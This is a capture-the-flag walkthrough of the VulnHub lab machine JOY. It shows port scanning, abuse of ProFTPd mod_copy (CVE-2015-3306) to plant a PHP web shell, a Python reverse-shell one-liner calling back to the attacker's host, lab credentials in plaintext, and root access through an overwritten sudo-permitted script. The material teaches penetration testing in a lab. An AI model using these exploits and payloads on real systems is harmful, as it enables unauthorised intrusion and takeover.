Digitalworld.local: JOY

https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
nmap scan for open ports + services
``` PORT STATE SERVICE VERSION 21/tcp open ftp | fingerprint-strings: | GenericLines: | 220 The Good Tech Inc. FTP Server | Invalid command: try being more creative |_ Invalid command: try being more creative 22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0) 25/tcp open smtp Postfix smtpd |_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-ls: Volume / | SIZE TIME FILENAME | - 2016-07-19 20:03 ossec/ |_ | http-methods: |_ Supported Methods: POST OPTIONS HEAD GET |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Index of / 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: RESP-CODES TOP SASL AUTH-RESP-CODE PIPELINING STLS UIDL CAPA |_ssl-date: TLS randomness does not represent time 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd |_imap-capabilities: LITERAL+ capabilities more LOGIN-REFERRALS have LOGINDISABLEDA0001 post-login STARTTLS IDLE Pre-login SASL-IR IMAP4rev1 listed OK ENABLE ID |_ssl-date: TLS randomness does not represent time 445/tcp open netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP) 465/tcp open smtp Postfix smtpd |_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 587/tcp open smtp Postfix smtpd |_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 993/tcp open ssl/imaps? | ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG | Issuer: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2019-01-27T17:23:23 | Not valid after: 2032-10-05T17:23:23 | MD5: c8f9 a1cb ac3b baa1 f158 2916 d7bd d3b0 |_SHA-1: 5df6 1fce d31e e8c4 9bd9 b5b7 27fa 4f28 cfb9 34c6 |_ssl-date: TLS randomness does not represent time 995/tcp open ssl/pop3s? | ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG | Issuer: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2019-01-27T17:23:23 | Not valid after: 2032-10-05T17:23:23 | MD5: c8f9 a1cb ac3b baa1 f158 2916 d7bd d3b0 |_SHA-1: 5df6 1fce d31e e8c4 9bd9 b5b7 27fa 4f28 cfb9 34c6 |_ssl-date: TLS randomness does not represent time 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port21-TCP:V=7.91%I=7%D=5/1%Time=608D1EE9%P=x86_64-pc-linux-gnu%r(Gener SF:icLines,7F,"220\x20The\x20Good\x20Tech\x20Inc\.\x20FTP\x20Server\r\n500 SF:\x20Invalid\x20command:\x20try\x20being\x20more\x20creative\r\n500\x20I SF:nvalid\x20command:\x20try\x20being\x20more\x20creative\r\n"); MAC Address: 00:0C:29:C0:74:CD (VMware) Service Info: Hosts: JOY.localdomain, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -2h40m01s, deviation: 4h37m07s, median: -1s | nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | Names: | JOY<00> Flags: <unique><active> | JOY<03> Flags: <unique><active> | JOY<20> Flags: <unique><active> | \x01\x02__MSBROWSE__\x02<01> Flags: <group><active> | WORKGROUP<00> Flags: <group><active> | WORKGROUP<1d> Flags: <unique><active> |_ WORKGROUP<1e> Flags: <group><active> | smb-os-discovery: | OS: Windows 6.1 (Samba 4.5.12-Debian) | Computer name: joy | NetBIOS computer name: JOY\x00 | Domain name: \x00 | FQDN: joy |_ System time: 2021-05-01T17:27:22+08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-05-01T09:27:22 |_ start_date: N/A ```
SMB
``` ┌──(n0w4n㉿cyberlab)-[~/ctf/joy] └─$ enum4linux 192.168.58.137
...[SNIP]... S-1-22-1-1000 Unix User\patrick (Local User) S-1-22-1-1001 Unix User\ftp (Local User) ```
``` ┌──(n0w4n㉿cyberlab)-[~/ctf/joy] └─$ smbmap -R -H 192.168.58.137 [+] Guest session IP: 192.168.58.137:445 Name: unknown Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers IPC$ NO ACCESS IPC Service (Samba 4.5.12-Debian) ```
FTP
``` ┌──(n0w4n㉿cyberlab)-[~/ctf/joy] └─$ ftp ftp> open 192.168.58.137 Connected to 192.168.58.137. 220 The Good Tech Inc. FTP Server Name (192.168.58.137:n0w4n): anonymous 331 Anonymous login ok, send your complete email address as your password Password: 230 Anonymous access granted, restrictions apply Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful 150 Opening ASCII mode data connection for file list drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload 226 Transfer complete ftp> cd upload 250 CWD command successful ftp> ls 200 PORT command successful 150 Opening ASCII mode data connection for file list -rwxrwxr-x 1 ftp ftp 2110 May 1 09:36 directory -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_armadillo -rw-rw-rw- 1 ftp ftp 25 Jan 6 2019 project_bravado -rw-rw-rw- 1 ftp ftp 88 Jan 6 2019 project_desperado -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_emilio -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_flamingo -rw-rw-rw- 1 ftp ftp 7 Jan 6 2019 project_indigo -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_komodo -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_luyano -rw-rw-rw- 1 ftp ftp 8 Jan 6 2019 project_malindo -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_okacho -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_polento -rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_ronaldinho -rw-rw-rw- 1 ftp ftp 55 Jan 6 2019 project_sicko -rw-rw-rw- 1 ftp ftp 57 Jan 6 2019 project_toto -rw-rw-rw- 1 ftp ftp 5 Jan 6 2019 project_uno -rw-rw-rw- 1 ftp ftp 9 Jan 6 2019 project_vivino -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_woranto -rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_yolo -rw-rw-rw- 1 ftp ftp 180 Jan 6 2019 project_zoo -rwxrwxr-x 1 ftp ftp 24 Jan 6 2019 reminder ```
Downloading all files
``` ┌──(n0w4n㉿cyberlab)-[~/ctf/joy] └─$ wget -r ftp://anonymous:pass@192.168.58.137/upload/ ```
Result:
``` ┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137/upload] └─$ ls -lah total 60K drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 11:37 . drwxr-xr-x 3 n0w4n n0w4n 4.0K May 1 11:37 .. -rw-r--r-- 1 n0w4n n0w4n 2.1K May 1 09:36 directory -rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_armadillo -rw-r--r-- 1 n0w4n n0w4n 25 Jan 6 2019 project_bravado -rw-r--r-- 1 n0w4n n0w4n 88 Jan 6 2019 project_desperado -rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_emilio -rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_flamingo -rw-r--r-- 1 n0w4n n0w4n 7 Jan 6 2019 project_indigo -rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_komodo -rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_luyano -rw-r--r-- 1 n0w4n n0w4n 8 Jan 6 2019 project_malindo -rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_okacho -rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_polento -rw-r--r-- 1 n0w4n n0w4n 20 Jan 6 2019 project_ronaldinho -rw-r--r-- 1 n0w4n n0w4n 55 Jan 6 2019 project_sicko -rw-r--r-- 1 n0w4n n0w4n 57 Jan 6 2019 project_toto -rw-r--r-- 1 n0w4n n0w4n 5 Jan 6 2019 project_uno -rw-r--r-- 1 n0w4n n0w4n 9 Jan 6 2019 project_vivino -rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_woranto -rw-r--r-- 1 n0w4n n0w4n 20 Jan 6 2019 project_yolo -rw-r--r-- 1 n0w4n n0w4n 180 Jan 6 2019 project_zoo -rw-r--r-- 1 n0w4n n0w4n 24 Jan 6 2019 reminder ```
Reading all the files
``` ┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137/upload] └─$ for i in $(ls); do echo -e "\nFiles ${i}:" && cat ${i}; done Files directory: Patrick's Directory total 112 drwxr-xr-x 18 patrick patrick 4096 May 1 17:35 . drwxr-xr-x 4 root root 4096 Jan 6 2019 .. -rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history -rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout -rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache drwx------ 10 patrick patrick 4096 Dec 26 2018 .config -rw-r--r-- 1 patrick patrick 0 May 1 17:35 daqXrKzBXEAioPed3hhUH77s3i1JBNsx.txt drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg -rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha -rw-r--r-- 1 patrick patrick 0 May 1 17:30 hXtY5duoaey2PEbG67z04d4ryycBKBfw.txt -rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority -rw-r--r-- 1 patrick patrick 24 May 1 17:30 IUdSCvOu4GrXPvG16AifVYjMrO2JFRRgzqKdM56ojxsTsiaWXVO6lTNeKc1tQbE0.txt drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures -rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public -rw-r--r-- 1 patrick patrick 24 May 1 17:35 S1LuMxniGge5pjszHuwwbrRN2ToI6jOIlRL5uk3iXFgrMd8FA9iDVFH65gkXXOCV.txt d--------- 2 root root 4096 Jan 9 2019 script drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh -rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates -rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt -rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos You should know where the directory can be accessed. Information of this Machine! Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux Files project_armadillo: Files project_bravado: This is a brave project! Files project_desperado: What happens when you have no idea what you are doing? Bang your head against the wall. Files project_emilio: Files project_flamingo: Files project_indigo: colour Files project_komodo: Files project_luyano: Files project_malindo: airline Files project_okacho: Files project_polento: Files project_ronaldinho: skilled footballer! Files project_sicko: Perhaps the head of development is secretly a sicko... Files project_toto: either a dog name, or the name of a lottery in singapore Files project_uno: ONE! Files project_vivino: wine app Files project_woranto: Files project_yolo: you only live once! Files project_zoo: dog cat ant bird fish hare snake mouse eagle rabbit jaguar python penguin peacock phoenix kangaroo parakeet mosquito mousedeer woodlouse cockroach kingfisher rhinoceros pondskater Files reminder: Lock down this machine! ```
The file `version_control` seems interesting.
From the SMB enumeration we know there is a user ftp.
So copying this file from the home folder of patrick to the home folder of ftp should work.
``` ┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137] └─$ nc 192.168.58.137 21 220 The Good Tech Inc. FTP Server site cpfr /home/patrick/version_control 350 File or directory exists, ready for destination name site cpto /home/ftp/upload/version_control 250 Copy successful ```
``` ┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137] └─$ ftp ftp> open 192.168.58.137 Connected to 192.168.58.137. 220 The Good Tech Inc. FTP Server Name (192.168.58.137:n0w4n): anonymous 331 Anonymous login ok, send your complete email address as your password Password: 230 Anonymous access granted, restrictions apply Remote system type is UNIX. Using binary mode to transfer files. ftp> cd upload 250 CWD command successful ftp> ls 200 PORT command successful 150 Opening ASCII mode data connection for file list -rwxrwxr-x 1 ftp ftp 3524 May 1 10:12 directory -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_armadillo -rw-rw-rw- 1 ftp ftp 25 Jan 6 2019 project_bravado -rw-rw-rw- 1 ftp ftp 88 Jan 6 2019 project_desperado -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_emilio -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_flamingo -rw-rw-rw- 1 ftp ftp 7 Jan 6 2019 project_indigo -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_komodo -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_luyano -rw-rw-rw- 1 ftp ftp 8 Jan 6 2019 project_malindo -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_okacho -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_polento -rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_ronaldinho -rw-rw-rw- 1 ftp ftp 55 Jan 6 2019 project_sicko -rw-rw-rw- 1 ftp ftp 57 Jan 6 2019 project_toto -rw-rw-rw- 1 ftp ftp 5 Jan 6 2019 project_uno -rw-rw-rw- 1 ftp ftp 9 Jan 6 2019 project_vivino -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_woranto -rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_yolo -rw-rw-rw- 1 ftp ftp 180 Jan 6 2019 project_zoo -rwxrwxr-x 1 ftp ftp 24 Jan 6 2019 reminder -rw-r--r-- 1 0 0 407 May 1 10:09 version_control 226 Transfer complete ftp> get version_control local: version_control remote: version_control 200 PORT command successful 150 Opening BINARY mode data connection for version_control (407 bytes) 226 Transfer complete 407 bytes received in 0.00 secs (5.2452 MB/s) ftp> bye 221 Goodbye. ```
``` ┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137] └─$ cat version_control Version Control of External-Facing Services:
Apache: 2.4.25 Dropbear SSH: 0.34 ProFTPd: 1.3.5 Samba: 4.5.12 We should switch to OpenSSH and upgrade ProFTPd. Note that we have some other configurations in this machine. 1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy. 2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out. ```
There are several known exploits to be found on the internet.
This one I’m using: https://github.com/t0kx/exploit-CVE-2015-3306
``` ┌──(n0w4n㉿cyberlab)-[~/ctf/joy] └─$ ./exploit.py --host 192.168.58.137 --port 21 --path /var/www/tryingharderisjoy [+] CVE-2015-3306 exploit by t0kx [+] Exploiting 192.168.58.137:21 [+] Target exploited, acessing shell at http://192.168.58.137/backdoor.php [+] Running whoami: www-data [+] Done ```
Inside the python script is the parameter to use:
``` data = requests.get("http://" + self.__host + "/backdoor.php?cmd=whoami") ```
``` ┌──(n0w4n㉿cyberlab)-[~/ctf/joy] └─$ curl -s http://192.168.58.137/backdoor.php?cmd=id proftpd: 192.168.58.128:43890: SITE cpto /tmp/.uid=33(www-data) gid=33(www-data) groups=33(www-data),123(ossec) ```
Getting a revser shell with this backdoor
Payload:
``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.128",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ```
Result:
``` ┌──(n0w4n㉿cyberlab)-[~/ctf/joy] └─$ sudo nc -lvp 9999 [sudo] password for n0w4n: listening on [any] 9999 ... 192.168.58.137: inverse host lookup failed: Host name lookup failure connect to [192.168.58.128] from (UNKNOWN) [192.168.58.137] 47188 /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data),123(ossec) ```
Time for the recon phase
``` www-data@JOY:/var/www/tryingharderisjoy$ cd ossec cd ossec www-data@JOY:/var/www/tryingharderisjoy/ossec$ ls -lah ls -lah total 116K drwxr-xr-x 8 www-data www-data 4.0K Jan 6 2019 . drwxr-xr-x 3 www-data www-data 4.0K May 1 18:30 .. -rw-r--r-- 1 www-data www-data 92 Jul 19 2016 .hgtags -rw-r--r-- 1 www-data www-data 262 Dec 28 2018 .htaccess -rw-r--r-- 1 www-data www-data 44 Dec 28 2018 .htpasswd -rwxr-xr-x 1 www-data www-data 317 Jul 19 2016 CONTRIB -rw-r--r-- 1 www-data www-data 35K Jul 19 2016 LICENSE -rw-r--r-- 1 www-data www-data 2.1K Jul 19 2016 README -rw-r--r-- 1 www-data www-data 923 Jul 19 2016 README.search drwxr-xr-x 3 www-data www-data 4.0K Jul 19 2016 css -rw-r--r-- 1 www-data www-data 218 Jul 19 2016 htaccess_def.txt drwxr-xr-x 2 www-data www-data 4.0K Jul 19 2016 img -rwxr-xr-x 1 www-data www-data 5.1K Jul 19 2016 index.php drwxr-xr-x 2 www-data www-data 4.0K Jul 19 2016 js drwxr-xr-x 3 www-data www-data 4.0K Dec 28 2018 lib -rw-r--r-- 1 www-data www-data 462 Jul 19 2016 ossec_conf.php -rw-r--r-- 1 www-data www-data 134 Jan 6 2019 patricksecretsofjoy -rwxr-xr-x 1 www-data www-data 2.5K Jul 19 2016 setup.sh drwxr-xr-x 2 www-data www-data 4.0K Dec 28 2018 site drwxrwxrwx 2 www-data www-data 4.0K Dec 28 2018 tmp www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy cat patricksecretsofjoy credentials for JOY: patrick:apollo098765 root:howtheheckdoiknowwhattherootpasswordis
how would these hack3rs ever find such a page? ```
``` www-data@JOY:/var/www/tryingharderisjoy/ossec$ su root su root Password: howtheheckdoiknowwhattherootpasswordis
su: Authentication failure www-data@JOY:/var/www/tryingharderisjoy/ossec$ su patrick su patrick Password: apollo098765 patrick@JOY:/var/www/tryingharderisjoy/ossec$ id id uid=1000(patrick) gid=1000(patrick) groups=1000(patrick),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner),1001(ftp) ```
``` patrick@JOY:/var/www/tryingharderisjoy/ossec$ sudo -l sudo -l Matching Defaults entries for patrick on JOY: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User patrick may run the following commands on JOY: (ALL) NOPASSWD: /home/patrick/script/test ```
First get access to the folder
``` patrick@JOY:~$ sudo /home/patrick/script/test sudo /home/patrick/script/test I am practising how to do simple bash scripting! What file would you like to change permissions within this directory? ../script/ ../script/ What permissions would you like to set the file to? 777 777 Currently changing file permissions, please wait. Tidying up... Done! ```
Then change the content of the file `test` and run it with the sudo command
``` patrick@JOY:~/script$ echo '#!/bin/bash' > test echo '#!/bin/bash' > test patrick@JOY:~/script$ echo '/bin/bash' >> test echo '/bin/bash' >> test patrick@JOY:~/script$ sudo /home/patrick/script/test sudo /home/patrick/script/test root@JOY:/home/patrick/script# id id uid=0(root) gid=0(root) groups=0(root) ```
Final part
``` root@JOY:/home/patrick/script# cat /root/proof.txt cat /root/proof.txt Never grant sudo permissions on scripts that perform system functions! ```